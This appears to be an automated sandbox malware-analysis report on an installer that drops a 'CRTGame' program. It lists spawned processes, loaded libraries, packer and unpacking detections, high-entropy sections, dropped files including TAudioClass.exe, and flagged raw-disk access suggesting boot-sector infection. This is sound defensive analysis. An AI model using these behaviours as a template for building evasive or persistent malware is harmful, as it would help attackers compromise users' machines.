Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Process created: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp "C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp" /SL5="$103C0,6985375,54272,C:\Users\user\Desktop\wG1fFAzGfH.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10	Jump to behavior

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: wG1fFAzGfH.exe

Static file information: File size 7240000 > 1048576

Source:	Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-9BPJ8.tmp.1.dr
Source:	Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-A2FB0.tmp.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Unpacked PE file: 5.2.crtgame.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.hsave:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Unpacked PE file: 5.2.crtgame.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp

Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,

1_2_0044C030

Source: initial sample

Static PE information: section where entry point is pointing to: petite

Source: crtgame.exe.1.dr	Static PE information: section name: .hsave
Source: is-2ASPL.tmp.1.dr	Static PE information: section name: /4
Source: is-3DI9V.tmp.1.dr	Static PE information: section name: /4
Source: is-GP3AQ.tmp.1.dr	Static PE information: section name: /4
Source: is-40RRA.tmp.1.dr	Static PE information: section name: /4
Source: is-40RRA.tmp.1.dr	Static PE information: section name: /19
Source: is-40RRA.tmp.1.dr	Static PE information: section name: /31
Source: is-40RRA.tmp.1.dr	Static PE information: section name: /45
Source: is-40RRA.tmp.1.dr	Static PE information: section name: /57
Source: is-40RRA.tmp.1.dr	Static PE information: section name: /70
Source: is-40RRA.tmp.1.dr	Static PE information: section name: /81
Source: is-40RRA.tmp.1.dr	Static PE information: section name: /92
Source: is-A2FB0.tmp.1.dr	Static PE information: section name: .trace
Source: is-A2FB0.tmp.1.dr	Static PE information: section name: _RDATA
Source: is-A2FB0.tmp.1.dr	Static PE information: section name: .debug_o
Source: is-FLLBO.tmp.1.dr	Static PE information: section name: /4
Source: is-B7IAM.tmp.1.dr	Static PE information: section name: /4
Source: is-B6UBH.tmp.1.dr	Static PE information: section name: /4
Source: is-6I8EB.tmp.1.dr	Static PE information: section name: /4
Source: is-LPFO4.tmp.1.dr	Static PE information: section name: /4
Source: is-TO8AC.tmp.1.dr	Static PE information: section name: /4
Source: is-PV0J3.tmp.1.dr	Static PE information: section name: /4
Source: is-GV5KO.tmp.1.dr	Static PE information: section name: /4
Source: is-UNJDD.tmp.1.dr	Static PE information: section name: /4
Source: is-FQCKS.tmp.1.dr	Static PE information: section name:
Source: is-FQCKS.tmp.1.dr	Static PE information: section name:
Source: is-FQCKS.tmp.1.dr	Static PE information: section name: petite
Source: is-9INH5.tmp.1.dr	Static PE information: section name: /4
Source: is-8HTIS.tmp.1.dr	Static PE information: section name:
Source: is-8HTIS.tmp.1.dr	Static PE information: section name:
Source: is-8HTIS.tmp.1.dr	Static PE information: section name: petite
Source: is-RPVR0.tmp.1.dr	Static PE information: section name:
Source: is-RPVR0.tmp.1.dr	Static PE information: section name:
Source: is-RPVR0.tmp.1.dr	Static PE information: section name: petite
Source: is-LOMUV.tmp.1.dr	Static PE information: section name:
Source: is-LOMUV.tmp.1.dr	Static PE information: section name: petite
Source: is-J5DR2.tmp.1.dr	Static PE information: section name:
Source: is-J5DR2.tmp.1.dr	Static PE information: section name:
Source: is-J5DR2.tmp.1.dr	Static PE information: section name: petite
Source: is-93I59.tmp.1.dr	Static PE information: section name: /4
Source: is-M9T5O.tmp.1.dr	Static PE information: section name: .sxdata
Source: is-J36DT.tmp.1.dr	Static PE information: section name: .didata
Source: is-VKOGP.tmp.1.dr	Static PE information: section name:
Source: is-VKOGP.tmp.1.dr	Static PE information: section name:
Source: is-VKOGP.tmp.1.dr	Static PE information: section name: petite
Source: is-J1FBL.tmp.1.dr	Static PE information: section name:
Source: is-J1FBL.tmp.1.dr	Static PE information: section name: petite
Source: is-GNGP9.tmp.1.dr	Static PE information: section name:
Source: is-GNGP9.tmp.1.dr	Static PE information: section name:
Source: is-GNGP9.tmp.1.dr	Static PE information: section name:
Source: is-V5C1L.tmp.1.dr	Static PE information: section name:
Source: is-V5C1L.tmp.1.dr	Static PE information: section name:
Source: is-V5C1L.tmp.1.dr	Static PE information: section name: petite
Source: is-5L10M.tmp.1.dr	Static PE information: section name:
Source: is-5L10M.tmp.1.dr	Static PE information: section name:
Source: is-5L10M.tmp.1.dr	Static PE information: section name:
Source: is-JKH63.tmp.1.dr	Static PE information: section name:
Source: is-JKH63.tmp.1.dr	Static PE information: section name:
Source: is-JKH63.tmp.1.dr	Static PE information: section name: petite
Source: is-IQEKE.tmp.1.dr	Static PE information: section name:
Source: is-IQEKE.tmp.1.dr	Static PE information: section name:
Source: is-IQEKE.tmp.1.dr	Static PE information: section name: petite
Source: is-0T8SC.tmp.1.dr	Static PE information: section name:
Source: is-0T8SC.tmp.1.dr	Static PE information: section name:
Source: is-0T8SC.tmp.1.dr	Static PE information: section name:
Source: is-DDN59.tmp.1.dr	Static PE information: section name:
Source: is-DDN59.tmp.1.dr	Static PE information: section name:
Source: is-DDN59.tmp.1.dr	Static PE information: section name: petite
Source: is-VG2L5.tmp.1.dr	Static PE information: section name: /4
Source: is-CIN2V.tmp.1.dr	Static PE information: section name: /4
Source: is-2AGLA.tmp.1.dr	Static PE information: section name: /4
Source: is-VFRK7.tmp.1.dr	Static PE information: section name: /4
Source: is-1BOH7.tmp.1.dr	Static PE information: section name:
Source: is-1BOH7.tmp.1.dr	Static PE information: section name:
Source: is-1BOH7.tmp.1.dr	Static PE information: section name:
Source: is-JM3DF.tmp.1.dr	Static PE information: section name: /4
Source: is-MOAUB.tmp.1.dr	Static PE information: section name: .eh_fram
Source: is-T5S6S.tmp.1.dr	Static PE information: section name: asmcode
Source: is-KHKMO.tmp.1.dr	Static PE information: section name: .eh_fram
Source: is-P220F.tmp.1.dr	Static PE information: section name: /4
Source: is-F2AK9.tmp.1.dr	Static PE information: section name: /4
Source: is-NLS7L.tmp.1.dr	Static PE information: section name: /4
Source: TAudioClass.exe.5.dr	Static PE information: section name: .hsave

Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_004065B8 push 004065F5h; ret	0_2_004065ED
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_004040B5 push eax; ret	0_2_004040F1
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax	0_2_00408109
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_00404185 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_00404206 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_0040C218 push eax; ret	0_2_0040C219
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_004042E8 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_00404283 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\wG1fFAzGfH.exe	Code function: 0_2_00408F38 push 00408F6Bh; ret	0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00409954 push 00409991h; ret	1_2_00409989
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0040A04F push ds; ret	1_2_0040A050
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0040A023 push ds; ret	1_2_0040A04D
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax	1_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004822F4 push 004823D2h; ret	1_2_004823CA
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004765B0 push ecx; mov dword ptr [esp], edx	1_2_004765B1
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx	1_2_004106E5
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00412938 push 0041299Bh; ret	1_2_00412993
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004589F0 push 00458A34h; ret	1_2_00458A2C
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx	1_2_00442C98
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_00450E58 push 00450E8Bh; ret	1_2_00450E83
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0045101C push ecx; mov dword ptr [esp], eax	1_2_00451021
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx	1_2_0040D03A
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0049310C push ecx; mov dword ptr [esp], ecx	1_2_00493111
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004571B0 push 004571E8h; ret	1_2_004571E0
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0045F444 push ecx; mov dword ptr [esp], ecx	1_2_0045F448
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0040546D push eax; ret	1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0040553D push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx	1_2_0040F59A
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004055BE push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_0040563B push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	Code function: 1_2_004056A0 push 00405749h; ret	1_2_00405741

Source: crtgame.exe.1.dr	Static PE information: section name: .text entropy: 7.587380705080058
Source: is-GNGP9.tmp.1.dr	Static PE information: section name: entropy: 7.953893773659523
Source: is-5L10M.tmp.1.dr	Static PE information: section name: entropy: 7.921519965168042
Source: is-IQEKE.tmp.1.dr	Static PE information: section name: entropy: 7.966771808365004
Source: is-0T8SC.tmp.1.dr	Static PE information: section name: entropy: 7.950928332152424
Source: is-1BOH7.tmp.1.dr	Static PE information: section name: entropy: 7.491817342209834
Source: TAudioClass.exe.5.dr	Static PE information: section name: .text entropy: 7.587380705080058

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		5_2_00401A58
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		7_2_02C3F2AF

Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-0T8SC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-FQCKS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-GP3AQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-UJSO3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-GNGP9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-VKOGP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-PTERI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-P220F.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-F2AK9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-NLS7L.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-TO8AC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-V5C1L.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-3DI9V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-9BPJ8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-8HTIS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-MOAUB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-CIN2V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-T5S6S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-6I8EB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-5L10M.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-DDN59.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-VG2L5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-FLLBO.tmp	Jump to dropped file
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File created: C:\ProgramData\TAudioClass\TAudioClass.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-NGO5I.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp	File created: C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_iscrypt.dll	Jump to dropped file
